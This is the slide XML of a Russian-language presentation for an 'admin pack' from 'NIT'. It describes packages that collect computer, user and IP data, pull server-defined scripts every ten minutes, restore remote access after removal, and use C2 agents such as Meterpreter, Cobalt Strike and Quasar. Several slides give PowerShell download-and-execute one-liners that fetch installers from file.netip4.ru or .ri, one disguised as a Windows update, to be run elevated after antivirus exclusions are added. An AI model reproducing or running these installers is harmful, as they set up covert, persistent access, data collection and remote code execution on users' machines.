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5" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="277" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="278" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="265" r:id="rId20"/>
    <p:sldId id="264" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="274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53B4AB-BFBE-490E-BA27-CE1B4DA7CD88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F8FA3B-F709-4EA4-A9DC-7EEE7923C1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404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DCD060-5420-6BC9-5352-6C798A67C0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Продукция </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT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B4A758F-D677-8CDE-E520-DB17B840EF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Использование программ удалённого доступа в админ-паке</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21764665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0F8D5D-BFF2-E929-41BD-C26102983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Remote Monitoring: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>сведения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49685B-CD8A-FFA0-B5A1-238DE44DF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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Monitoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>устанавливается после установки всех остальных пакетов админ-пака, являясь практически финальным пакетом.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Установка данного пакета не обязательная, но крайне желательная, поскольку он может, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>некоторм</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> способом, заменять </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DynDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>сервисы.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2327033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8B5ECD-43FC-3047-9023-A7D040296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Remote Monitoring: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>принципы работы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A4C032-1AFA-213C-DEF4-D80A74F7E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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>устанавливаетсяна</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> компьютер, в планировщике прописывается выполнение скрипта каждые 10 минут от имени служебного пользователя </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSSQLSR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Каждые 10 минут запускается скрипт, собирающий данные об имени компьютера, пользователе и внешнем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4, IPv6.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Эти данные передаются в файловое хранилище на сервере </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Опционально в пакет встроен скрипт, который загружается и выполняется каждые десять минут, ничего не делая в системе. Скрипт нужен для восстановления доступа к компьютеру после удаления других программ удалённого доступа.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879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BA61F-1A22-055F-27B9-B3252544E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Установка пакета </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Monitoring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B961B6-DD84-1705-6E72-59ECD3ED5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highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>("http://file.netip4.ri:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>WinUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>WindowsMainUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/Other/ReverseMonitoringSetup-002.cmd", "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\ReverseMonitoringSetup-002.cmd"); &amp; cmd.exe /c $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\ReverseMonitoringSetup-002.cmd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Данная команда выполняется в командной строке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>запущенной с повышенными привилегиями.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Предварительно в системе должны быть установлены исключения антивируса.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1440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D1E080-D7A5-CA0B-62BF-F37913079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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT Scheduled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A9A57-96C3-F402-EF88-36FC6F3A0C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Описание</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2406097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330A53-23BE-48EF-56C4-659009257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NIT Scheduled: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>описание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797F65-9F2E-95B8-6DE1-7C3EE6BEF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Данный набор скриптов устанавливается после установки набора скриптов </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Monitoring, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>и служит для выполнения скриптов по расписанию, строго зашитых в его коде, загружаемого с сервера </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Пользователь не может изменить операции, назначаемые скриптами. Такие скрипты могут, в том числе, и использоваться для показа рекламы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Код скриптов, которые должны быть выполнены планировщиком, загружаются с сервера </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>загружаются каждые 10 минут в момент простоя компьютера.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759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C2AFCF-86C5-1FDC-0CAC-EFF8236A5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Установка пакета </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT Scheduler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20EF80-E059-6D6D-3B50-B6FC0D6D1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>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>("http://file.netip4.ri:80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>Exponenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/Scripts/NIT-Scheduler-Install.bat", "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\NIT-Scheduler-Install.bat"); &amp; cmd.exe /c $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\NIT-Scheduler-Install.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Данная команда выполняется в командной строке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>запущенной с повышенными привилегиями.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Предварительно в системе должны быть установлены исключения антивируса.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Для установки новой версии программы нужно сначала удалить старую версию.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34476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B655D-5E61-065F-5B68-D89295016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Пакет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run Scheduler Folder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A15BA15-9E47-1040-D74E-BABBCCEEE4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Описание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41540971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F53C77-212D-33B0-7197-D38EE6167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 Scheduler Folder: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>принципы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B33818-4141-6E5B-51FA-4225D8A94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Набор скриптов </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run Scheduler Folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>аналогичен по функционалу с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT Scheduled, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>только он запускает скрипты и программы из специально созданных пользовательских папок.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Пакет устанавливается после </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TinySend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>и на текущий момент является обязательным.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>В отличие от набора </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT Scheduled, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>состав запускаемых программ определяется пользователем компьютера, а не администратором сервера </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Кроме того, пакет не отправляет никакой статистики в базовом варианте. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26017302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2FE8FA-4E54-2812-141E-EBDF61667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Установка программы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run Scheduler Folder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B42547-6CFB-C38D-7DA0-FF2D3C7AAE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highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>wc.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>("http://file.netip4.ru/PROGS/NIT/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>RunFromFolderSchedule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>download.php?file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>=RunFromFolderSchedule.installscripts.ps1", "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\RunFromFolderSchedule.installscripts.ps1"); &amp; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>env:UserProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>\RunFromFolderSchedule.installscripts.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Данная команда выполняется в командной строке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>запущенной с повышенными привилегиями.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Предварительно в системе должны быть установлены исключения антивируса.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53365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36A53C-2AF4-633F-1D2B-B2BAB5A2C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Приложения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92B7C3-3CD9-4AFB-1DBE-6228D9B956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Общие положения</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="946288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C6C7AF-ADA4-0E11-63AE-20B4F6B2C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Организация удалённого доступа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5249E88-3C18-857F-2659-55A8C8E16A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Общие сведения</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13637634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19EC9E-713A-E375-C5D7-DC613A9D7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Приложение: собираемые данные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3F712F-054D-C175-750B-2B85638593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Имя компьютера</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Сетевой домен </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(FQDN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>компьютера</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Имя пользователя</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Внутренние </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4, IPv6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>адреса</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Внешние </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPv4, IPv6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>адреса, провайдер</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Тип, разрядность и кодовая страница операционной системы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Остальные данные — по мере возможностей</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23560920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E8AF57-ED4E-917C-277B-0C61A4060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Приложение:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>загружаемые инструменты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45F61D-7B9F-BFBD-1EE8-2EC19BEC0E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качестве инструментов удалённого доступа могут быть </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1"/>
              <a:t>использованя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t> следующие пакеты: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Агент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2 Meterpreter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Агент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2 Cobalt Strike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Агент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RMS Studio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Агент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mesh Studio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Агент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quasar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Использование других агентов под вопросом.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33528612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973E1E-86E6-6536-D158-E82BB46F4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Приложение</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>интервалы планировщика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5E8B3C-E2E4-265E-5F9C-F2FC2F7EA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NIT Scheduled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>позволяет выполнять загруженные скрипты со следующей периодичностью:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Каждые 10 минут</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Каждые 15 минут</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Каждые 30 минут</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Каждый час</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Каждые сутки</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Раз в неделю</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Раз в месяц</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11905381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F0B793-4A1C-92D2-2254-148BD0C52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 Scheduled Folder: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>файлы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33DECC-E017-B67D-0ABE-44D6A0EDE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 папках для запуска программ могут содержаться следующие файлы:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>скрипты и командлеты.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Командные файлы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Исполняемые файлы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Скрипты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Shell Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Остальные скрипты могут быть добавлены позднее</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4054889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CD4A9D-C5A9-F326-594F-966D37115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Общие сведения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2127C6-958D-CDBB-6918-4FD667830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Удалённый доступ к компьютеру пользователя — неотъемлемая часть админ-пака, позволяющая оператору и системному администратору оперативно оказывать помощь клиентам.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Удалённый доступ происходит через собственные сервера удалённого доступа </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NIT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>В качестве инструментов удалённого доступа используются пакеты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2, Reverse Shell, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
